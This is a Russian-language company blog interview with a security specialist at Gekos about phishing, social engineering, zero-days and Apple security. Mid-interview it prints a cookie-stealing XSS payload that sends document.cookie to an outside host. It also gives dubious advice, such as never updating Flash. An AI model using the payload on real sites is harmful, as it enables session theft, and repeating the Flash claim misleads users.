Интервью с Gekos: адепт информационной безопасности

Роман Ананьев, ПМ в Gekos

Роман Ананьев – специалист по безопасности информационных систем, порядочный хакер и, несмотря на молодость, философ. Мы уверены, что он гений, и что ему можно доверять, поэтому Рому очень ценят в Gekos.

– Рома, ты можешь работать по 20 часов в сутки. Как так получается?

– Это связано с моими физиологическими особенностями. Организм функционирует так, что я мало сплю. В сутки может быть 2-3 часа, а могу и вообще не спать несколько суток подряд. Из-за этого больше времени для работы, и на работоспособности такой режим не сказывается негативно.

– У нас в компании нет стандартных должностей, каждый отвечает за часть результата. Чем ты занимаешься в проектах?

– Я – менеджер проектов, которые строятся на поиске уязвимости в различных системах и компаниях. Я проверяю, как защищены системы, нахожу слабые места в безопасности, указываю на них и нахожу способы их усилить. Иногда я программирую, но только по мановению души, а всё остальное время копаюсь в безопасности. Могу проектировать архитектуру, могу взять паяльник и заставить железо работать правильно.

– Расскажи, где чаще всего находятся дырки в безопасности крупных проектов?

– Самая большая проблема – это всегда люди. Они непредсказуемы, они делают глупости, поэтому мне часто приходится заниматься социальной инженерией. Сотрудники получают письма с фишинговыми ссылками, переходят по ним, загружают вирусы в рабочие системы. Это проблема. Когда мы были на корпоративе в Египте, я получил доступ к десяткам рабочих почт просто потому, что они были в одной незащищенной Wi-Fi сети. Однажды я проводил эксперимент: «ронял» в офисе несколько флешек. В 60% случаев люди поднимали их и вставляли в компьютеры.

–  Слушай, а ведь так удобно заниматься промышленным шпионажем и ломать системы конкурентов. В СНГ это распространено?

– Очень распространено, как и по всему миру. Я бывал на конференциях BlackHat, ZeroNights – там много об этом говорят. Приходят люди, которые сами ломают других, и рассказывают о своём опыте. Создают вирусы, находят уязвимости, роняют флешки, присылают письма, создают “фейковые” сайты, а иногда речь идёт даже о физическом проникновении на чужую территорию.

Дело в том, что компьютеры доверчивы. Они могут подозрительно относиться к программе, но не к пользователю, и не к тому, что эмулирует его поведение. Можно купить просто в магазине мышь, которая подключается через USB. У неё внутри может быть вредоносное ПО. Компьютер его сразу воспринимает, и может быть атакован даже мышкой.

– Ого, риски везде! Какие рекомендации по безопасности ты даёшь нашим клиентам в их проектах?

– Мы работаем с интернет-технологиями, поэтому о взломе железа я говорю меньше. Первое, что нельзя делать никогда – обновлять Flash-плеер. В 99% случаев в обновлении будет вирус. Ещё нужно обязательно проверять ссылки, по которым вы переходите. Например, вам дают ссылку на Google, где первое «о» заменено на «0». Это сложно заметить, и это прямой фишинг. Ваши данные хотят стащить. Я видел фейковый сайт Google Analytics. Если там авторизоваться, ловушка даже может переслать вас на нормальный сайт, но данные похитит.

С нашими клиентами мы придерживаемся стандартов разработки и правильно настраиваем сервера. Если не ошибаться, проблем будет гораздо меньше.

К сожалению, не существует систем,  которые нельзя сломать. Сейчас вирусы умные, и хакеры умные, и новые дырки в безопасности находятся постоянно. Новые угрозы, от которых ещё нет способов защититься, называются 0-day(zero-day). Это когда вот сегодня возникает проблема, «заплатки» ещё нет, и слабым местом начинают пользоваться все, кому не лень. Тут начинается бой на скорость: или кто-то выжмет через неё всё, или ошибку исправят”.

На самом деле, даже старые угрозы, нейтрализацию которых придумали уже давно, встречаются на сайтах то тут, то там. Проверьте себя: если вставить

«?p=’><script>img=new Image();img.src=»https://ddrt.su/img.gif?»+document.cookie;»+document.cookie;</script>»

в адрес сайта, то можно получить cookie и данные о пользователе, а потом скомпрометировать его. Это самая простая проблема, с которой можно столкнуться.

Предотвратить такие вещи возможно, если соблюдать правила обработки данных, а так же можно расставить маячки, чтобы вовремя поймать и решить новые проблемы. Существуют IDS-системы, которые следят за серверами. Я сейчас с ними работаю. Они помогают быстро реагировать.

– Ты сказал, что сломать можно всё, а как же Apple?

– Их устойчивость ко взлому – только маркетинговый ход. Они позиционируют своё ПО как ПО без вирусов, потому что вся техника Apple работает на закрытом исходном коде (проприетарном). Это значит, что никто за пределами компании не может проверить код, он теоретически хранится в тайне. Но на самом деле хакерам известны эти коды и методы, поэтому вирусы успешно атакуют iOS. А вот исправления выходят гораздо реже, чем у того же Android, где пользователь без особых навыков может сам установить патчи для нейтрализации уязвимости, в отличие от пользователя iOS.

Вот неделю назад кто-то сломал Apple TV. Я не понимаю, зачем, но это сделали. Большая проблема Apple, да и вообще всей техники сейчас – криптолокеры. Это вирус, который зашифровывает ваши файлы и требует отправить платное смс, чтобы расшифровать.

– Надо очень много знать, чтобы стать хакером. Почему люди начинают ломать чужие системы и красть данные?

– У всех по-разному. Действительно нужно много понимать: как работает ПО и железо. В основном люди становятся хакерами, потому что так получилось. Есть несколько видов хакеров. Есть BlackHat и WhiteHat, как бы по цвету шляпы. Черные наживаются на чужих ошибках, а белых нанимают проверить безопасность и указать на проблемы. Я могу рассказать, как я сам к этому пришел.

Сначала я пробовал создавать системы, задумывался о безопасности. Начинал проверять баги. Находил много дыр, замечал наборы уязвимости, думал, как их исправить. Есть люди, которые паяли железо и занимаются взломом железа, потому что знают его слабости. Переход на тёмную сторону – это личный выбор.

– Давай поговорим о тебе за пределами работы. Как тебе нравится жить?

– Мне нравится искать баги, создавать продукты для удобства людей во всех сферах. Жизнь у меня делится на работу, сон и серфинг. Иногда я ем, в основном пиццу. Серфил пока мало где: в Марокко и на Балтийском море. Хочу посерфить на Бали, говорят, там отличные волны. Но долгосрочных планов не строю. Я заметил, что у меня такие не получаются. Если долго думать о чём-то, я обязательно найду в этом уязвимость. Со временем ты начинаешь видеть слабые места во всём.

– Ты хотел бы жить в идеальном мире?

– Мир не может быть идеальным. Если бы он был таким, мне бы нечего было искать. Но если в мире есть люди, в нём будут ошибки. А без людей мне грустно.



Комментарии

Комментарии (0)

Ваш e-mail не будет опубликован.
Обязательные поля помечены *

ПОСЛЕДНИЕ КОММЕНТАРИИ

  • Эстония
    Tien
    : Is that really all there is to it because that'd be flaibergastbng.
  • Полезные советы новичкам WordPress
    Роман
    : В строке с "else if" в примере (на картинке) вроде не хватает одной закрывающей кавычки. И
  • Gekos красно-золотой
    Админ Блогович
    : ИЛИ выступлениями на внешних семинарах/конференциях
  • Gekos в Стамбуле: мы работаем там, где лето
    Денис
    : Очень крутая статья!
  • Как увернуться от гранаты или «Яндекс АГС – уберется все!»
    Рустем
    : Спасибо за кейс. На счёт хостингов - полностью согласен. Некоторые сайты расположены на ка
  •